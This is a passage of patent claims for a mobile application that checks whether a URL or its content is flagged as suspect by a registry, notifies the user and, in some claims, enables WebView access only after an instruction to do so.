 16. The system of claim 10,wherein the source content that the mobile application has accessed oris trying to access is determined to be suspect by whether a registryhas determined the content or a universal resource identifier of a webpage associated with the content is suspect.
 17. The method of claim 16,wherein the native universal resource identifier is a universal resourcelocator.
 18. The method of claim 10, further comprising enabling accessto the content by the mobile computer device only after receipt by themobile computer device of an instruction to enable access to thecontent.
 19. The method of claim 18, wherein the instruction to enableaccess the content is user generated.
 20. A computer-implemented method,the method implemented using a mobile device bi-directionally coupledwith an electronic communications network (“the network”), and themobile device comprising a processor coupled to a memory device, themethod comprising: the mobile device executing a mobile application thatis adapted to both receive a universal resource identifier from thenetwork and to apply the universal resource identifier exclusivelywithin the mobile application to access a content from the network,wherein the mobile application is enabled to access the content from thenetwork through a WebView of the mobile application; determining thatthe universal resource identifier is associated with an indication ofinformation integrity; and the mobile application notifying a user ofthe mobile device that the universal resource identifier is associatedwith the indication of information integrity.